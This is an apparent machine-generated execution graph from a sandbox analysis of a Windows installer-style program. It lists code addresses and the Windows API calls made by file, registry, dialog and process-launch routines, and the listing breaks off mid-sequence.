                                        execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 4418->4420 4422 40490c 4419->4422 4419->4433 4424 4048ea 4420->4424 4421 404960 CallWindowProcW 4421->4424 4434 40484e SendMessageW 4422->4434 4423->4421 4439 406009 lstrcpynW 4423->4439 4427 404945 4440 405f51 wsprintfW 4427->4440 4429 40494c 4430 40141d 80 API calls 4429->4430 4431 404953 4430->4431 4441 406009 lstrcpynW 4431->4441 4433->4421 4435 404871 GetMessagePos ScreenToClient SendMessageW 4434->4435 4436 4048ab SendMessageW 4434->4436 4437 4048a3 4435->4437 4438 4048a8 4435->4438 4436->4437 4437->4423 4438->4436 4439->4427 4440->4429 4441->4433 4442 4022cc 4443 40145c 18 API calls 4442->4443 4444 4022d3 4443->4444 4445 4062d5 2 API calls 4444->4445 4446 4022d9 4445->4446 4447 4022e8 4446->4447 4451 405f51 wsprintfW 4446->4451 4450 4030e3 4447->4450 4452 405f51 wsprintfW 4447->4452 4451->4447 4452->4450 4222 4050cd 4223 405295 4222->4223 4224 4050ee GetDlgItem GetDlgItem GetDlgItem 4222->4224 4225 4052c6 4223->4225 4226 40529e GetDlgItem CreateThread CloseHandle 4223->4226 4271 403d98 SendMessageW 4224->4271 4228 4052f4 4225->4228 4230 4052e0 ShowWindow ShowWindow 4225->4230 4231 405316 4225->4231 4226->4225 4274 405047 83 API calls 4226->4274 4232 405352 4228->4232 4234 405305 4228->4234 4235 40532b ShowWindow 4228->4235 4229 405162 4242 406805 18 API calls 4229->4242 4273 403d98 SendMessageW 4230->4273 4236 403dca 8 API calls 4231->4236 4232->4231 4237 40535d SendMessageW 4232->4237 4238 403d18 SendMessageW 4234->4238 4240 40534b 4235->4240 4241 40533d 4235->4241 4239 40528e 4236->4239 4237->4239 4244 405376 CreatePopupMenu 4237->4244 4238->4231 4243 403d18 SendMessageW 4240->4243 4245 404f72 25 API calls 4241->4245 4246 405181 4242->4246 4243->4232 4247 406805 18 API calls 4244->4247 4245->4240 4248 4062a3 11 API calls 4246->4248 4250 405386 AppendMenuW 4247->4250 4249 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4248->4249 4251 4051f3 4249->4251 4252 4051d7 SendMessageW SendMessageW 4249->4252 4253 405399 GetWindowRect 4250->4253 4254 4053ac 4250->4254 4255 405206 4251->4255 4256 4051f8 SendMessageW 4251->4256 4252->4251 4257 4053b3 TrackPopupMenu 4253->4257 4254->4257 4258 403d3f 19 API calls 4255->4258 4256->4255 4257->4239 4259 4053d1 4257->4259 4260 405216 4258->4260 4261 4053ed SendMessageW 4259->4261 4262 405253 GetDlgItem SendMessageW 4260->4262 4263 40521f ShowWindow 4260->4263 4261->4261 4264 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4261->4264 4262->4239 4267 405276 SendMessageW SendMessageW 4262->4267 4265 405242 4263->4265 4266 405235 ShowWindow 4263->4266 4268 40542f SendMessageW 4264->4268 4272 403d98 SendMessageW 4265->4272 4266->4265 4267->4239 4268->4268 4269 40545a GlobalUnlock SetClipboardData CloseClipboard 4268->4269 4269->4239 4271->4229 4272->4262 4273->4228 4453 4030cf 4454 40145c 18 API calls 4453->4454 4455 4030d6 4454->4455 4457 4030dc 4455->4457 4460 4063ac GlobalAlloc lstrlenW 4455->4460 4458 4030e3 4457->4458 4487 405f51 wsprintfW 4457->4487 4461 4063e2 4460->4461 4462 406434 4460->4462 4463 40640f GetVersionExW 4461->4463 4488 40602b CharUpperW 4461->4488 4462->4457 4463->4462 4464 40643e 4463->4464 4465 406464 LoadLibraryA 4464->4465 4466 40644d 4464->4466 4465->4462 4469 406482 GetProcAddress GetProcAddress GetProcAddress 4465->4469 4466->4462 4468 406585 GlobalFree 4466->4468 4470 40659b LoadLibraryA 4468->4470 4471 4066dd FreeLibrary 4468->4471 4474 4064aa 4469->4474 4477 4065f5 4469->4477 4470->4462 4473 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4470->4473 4471->4462 4472 406651 FreeLibrary 4481 40662a 4472->4481 4473->4477 4475 4064ce FreeLibrary GlobalFree 4474->4475 4474->4477 4483 4064ea 4474->4483 4475->4462 4476 4066ea 4479 4066ef CloseHandle FreeLibrary 4476->4479 4477->4472 4477->4481 4478 4064fc lstrcpyW OpenProcess 4480 40654f CloseHandle CharUpperW lstrcmpW 4478->4480 4478->4483 4482 406704 CloseHandle 4479->4482 4480->4477 4480->4483 4481->4476 4484 406685 lstrcmpW 4481->4484 4485 4066b6 CloseHandle 4481->4485 4486 4066d4 CloseHandle 4481->4486 4482->4479 4483->4468 4483->4478 4483->4480 4484->4481 4484->4482 4485->4481 4486->4471 4487->4458 4488->4461 4489 407752 4493 407344 4489->4493 4490 407c6d 4491 4073c2 GlobalFree 4492 4073cb GlobalAlloc 4491->4492 4492->4490 4492->4493 4493->4490 4493->4491 4493->4492 4493->4493 4494 407443 GlobalAlloc 4493->4494 4495 40743a GlobalFree 4493->4495 4494->4490 4494->4493 4495->4494 4496 401dd3 4497 401446 18 API calls 4496->4497 4498 401dda 4497->4498 4499 401446 18 API calls 4498->4499 4500 4018d3 4499->4500 4508 402e55 4509 40145c 18 API calls 4508->4509 4510 402e63 4509->4510 4511 402e79 4510->4511 4512 40145c 18 API calls 4510->4512 4513 405e30 2 API calls 4511->4513 4512->4511 4514 402e7f 4513->4514 4538 405e50 GetFileAttributesW CreateFileW 4514->4538 4516 402e8c 4517 402f35 4516->4517 4518 402e98 GlobalAlloc 4516->4518 4521 4062a3 11 API calls 4517->4521 4519 402eb1 4518->4519 4520 402f2c CloseHandle 4518->4520 4539 403368 SetFilePointer 4519->4539 4520->4517 4523 402f45 4521->4523 4525 402f50 DeleteFileW 4523->4525 4526 402f63 4523->4526 4524 402eb7 4528 403336 ReadFile 4524->4528 4525->4526 4540 401435 4526->4540 4529 402ec0 GlobalAlloc 4528->4529 4530 402ed0 4529->4530 4531 402f04 WriteFile GlobalFree 4529->4531 4532 40337f 37 API calls 4530->4532 4533 40337f 37 API calls 4531->4533 4537 402edd 4532->4537 4534 402f29 4533->4534 4534->4520 4536 402efb GlobalFree 4536->4531 4537->4536 4538->4516 4539->4524 4541 404f72 25 API calls 4540->4541 4542 401443 4541->4542 4543 401cd5 4544 401446 18 API calls 4543->4544 4545 401cdd 4544->4545 4546 401446 18 API calls 4545->4546 4547 401ce8 4546->4547 4548 40145c 18 API calls 4547->4548 4549 401cf1 4548->4549 4550 401d07 lstrlenW 4549->4550 4551 401d43 4549->4551 4552 401d11 4550->4552 4552->4551 4556 406009 lstrcpynW 4552->4556 4554 401d2c 4554->4551 4555 401d39 lstrlenW 4554->4555 4555->4551 4556->4554 4557 403cd6 4558 403ce1 4557->4558 4559 403ce5 4558->4559 4560 403ce8 GlobalAlloc 4558->4560 4560->4559 4561 402cd7 4562 401446 18 API calls 4561->4562 4565 402c64 4562->4565 4563 402d99 4564 402d17 ReadFile 4564->4565 4565->4561 4565->4563 4565->4564 4566 402dd8 4567 402ddf 4566->4567 4568 4030e3 4566->4568 4569 402de5 FindClose 4567->4569 4569->4568 4570 401d5c 4571 40145c 18 API calls 4570->4571 4572 401d63 4571->4572 4573 40145c 18 API calls 4572->4573 4574 401d6c 4573->4574 4575 401d73 lstrcmpiW 4574->4575 4576 401d86 lstrcmpW 4574->4576 4577 401d79 4575->4577 4576->4577 4578 401c99 4576->4578 4577->4576 4577->4578 4280 407c5f 4281 407344 4280->4281 4282 4073c2 GlobalFree 4281->4282 4283 4073cb GlobalAlloc 4281->4283 4284 407c6d 4281->4284 4285 407443 GlobalAlloc 4281->4285 4286 40743a GlobalFree 4281->4286 4282->4283 4283->4281 4283->4284 4285->4281 4285->4284 4286->4285 4579 404363 4580 404373 4579->4580 4581 40439c 4579->4581 4583 403d3f 19 API calls 4580->4583 4582 403dca 8 API calls 4581->4582 4584 4043a8 4582->4584 4585 404380 SetDlgItemTextW 4583->4585 4585->4581 4586 4027e3 4587 4027e9 4586->4587 4588 4027f2 4587->4588 4589 402836 4587->4589 4602 401553 4588->4602 4590 40145c 18 API calls 4589->4590 4592 40283d 4590->4592 4594 4062a3 11 API calls 4592->4594 4593 4027f9 4595 40145c 18 API calls 4593->4595 4600 401a13 4593->4600 4596 40284d 4594->4596 4597 40280a RegDeleteValueW 4595->4597 4606 40149d RegOpenKeyExW 4596->4606 4598 4062a3 11 API calls 4597->4598 4601 40282a RegCloseKey 4598->4601 4601->4600 4603 401563 4602->4603 4604 40145c 18 API calls 4603->4604 4605 401589 RegOpenKeyExW 4604->4605 4605->4593 4612 401515 4606->4612 4614 4014c9 4606->4614 4607 4014ef RegEnumKeyW 4608 401501 RegCloseKey 4607->4608 4607->4614 4609 4062fc 3 API calls 4608->4609 4611 401511 4609->4611 4610 401526 RegCloseKey 4610->4612 4611->4612 4615 401541 RegDeleteKeyW 4611->4615 4612->4600 4613 40149d 3 API calls 4613->4614 4614->4607 4614->4608 4614->4610 4614->4613 4615->4612 4616 403f64 4617 403f90 4616->4617 4618 403f74 4616->4618 4620 403fc3 4617->4620 4621 403f96 SHGetPathFromIDListW 4617->4621 4627 405c84 GetDlgItemTextW 4618->4627 4623 403fad SendMessageW 4621->4623 4624 403fa6 4621->4624 4622 403f81 SendMessageW 4622->4617 4623->4620 4625 40141d 80 API calls 4624->4625 4625->4623 4627->4622 4628 402ae4 4629 402aeb 4628->4629 4630 4030e3 4628->4630 4631 402af2 CloseHandle 4629->4631 4631->4630 4632 402065 4633 401446 18 API calls 4632->4633 4634 40206d 4633->4634 4635 401446 18 API calls 4634->4635 4636 402076 GetDlgItem 4635->4636 4637 4030dc 4636->4637 4638 4030e3 4637->4638 4640 405f51 wsprintfW 4637->4640 4640->4638 4641 402665 4642 40145c 18 API calls 4641->4642 4643 40266b 4642->4643 4644 40145c 18 API calls 4643->4644 4645 402674 4644->4645 4646 40145c 18 API calls 4645->4646 4647 40267d 4646->4647 4648 4062a3 11 API calls 4647->4648 4649 40268c 4648->4649 4650 4062d5 2 API calls 4649->4650 4651 402695 4650->4651 4652 4026a6 lstrlenW lstrlenW 4651->4652 4653 404f72 25 API calls 4651->4653 4656 4030e3 4651->4656 4654 404f72 25 API calls 4652->4654 4653->4651 4655 4026e8 SHFileOperationW 4654->4655 4655->4651 4655->4656 4664 401c69 4665 40145c 18 API calls 4664->4665 4666 401c70 4665->4666 4667 4062a3 11 API calls 4666->4667 4668 401c80 4667->4668 4669 405ca0 MessageBoxIndirectW 4668->4669 4670 401a13 4669->4670 4678 402f6e 4679 402f72 4678->4679 4680 402fae 4678->4680 4681 4062a3 11 API calls 4679->4681 4682 40145c 18 API calls 4680->4682 4683 402f7d 4681->4683 4688 402f9d 4682->4688 4684 4062a3 11 API calls 4683->4684 4685 402f90 4684->4685 4686 402fa2 4685->4686 4687 402f98 4685->4687 4690 4060e7 9 API calls 4686->4690 4689 403e74 5 API calls 4687->4689 4689->4688 4690->4688 4691 4023f0 4692 402403 4691->4692 4693 4024da 4691->4693 4694 40145c 18 API calls 4692->4694 4695 404f72 25 API calls 4693->4695 4696 40240a 4694->4696 4701 4024f1 4695->4701 4697 40145c 18 API calls 4696->4697 4698 402413 4697->4698 4699 402429 LoadLibraryExW 4698->4699 4700 40241b GetModuleHandleW 4698->4700 4702 40243e 4699->4702 4703 4024ce 4699->4703 4700->4699 4700->4702 4715 406365 GlobalAlloc WideCharToMultiByte 4702->4715 4704 404f72 25 API calls 4703->4704 4704->4693 4706 402449 4707 40248c 4706->4707 4708 40244f 4706->4708 4709 404f72 25 API calls 4707->4709 4711 401435 25 API calls 4708->4711 4713 40245f 4708->4713 4710 402496 4709->4710 4712 4062a3 11 API calls 4710->4712 4711->4713 4712->4713 4713->4701 4714 4024c0 FreeLibrary 4713->4714 4714->4701 4716 406390 GetProcAddress 4715->4716 4717 40639d GlobalFree 4715->4717 4716->4717 4717->4706 4718 402df3 4719 402dfa 4718->4719 4721 4019ec 4718->4721 4720 402e07 FindNextFileW 4719->4720 4720->4721 4722 402e16 4720->4722 4724 406009 lstrcpynW 4722->4724 4724->4721 4077 402175 4078 401446 18 API calls 4077->4078 4079 40217c 4078->4079 4080 401446 18 API calls 4079->4080 4081 402186 4080->4081 4082 4062a3 11 API calls 4081->4082 4086 402197 4081->4086 4082->4086 4083 4021aa EnableWindow 4085 4030e3 4083->4085 4084 40219f ShowWindow 4084->4085 4086->4083 4086->4084 4732 404077 4733 404081 4732->4733 4734 404084 lstrcpynW lstrlenW 4732->4734 4733->4734 4103 405479 4104 405491 4103->4104 4105 4055cd 4103->4105 4104->4105 4106 40549d 4104->4106 4107 40561e 4105->4107 4108 4055de GetDlgItem GetDlgItem 4105->4108 4109 4054a8 SetWindowPos 4106->4109 4110 4054bb 4106->4110 4112 405678 4107->4112 4120 40139d 80 API calls 4107->4120 4111 403d3f 19 API calls 4108->4111 4109->4110 4114 4054c0 ShowWindow 4110->4114 4115 4054d8 4110->4115 4116 405608 SetClassLongW 4111->4116 4113 403daf SendMessageW 4112->4113 4133 4055c8 4112->4133 4143 40568a 4113->4143 4114->4115 4117 4054e0 DestroyWindow 4115->4117 4118 4054fa 4115->4118 4119 40141d 80 API calls 4116->4119 4172 4058dc 4117->4172 4121 405510 4118->4121 4122 4054ff SetWindowLongW 4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 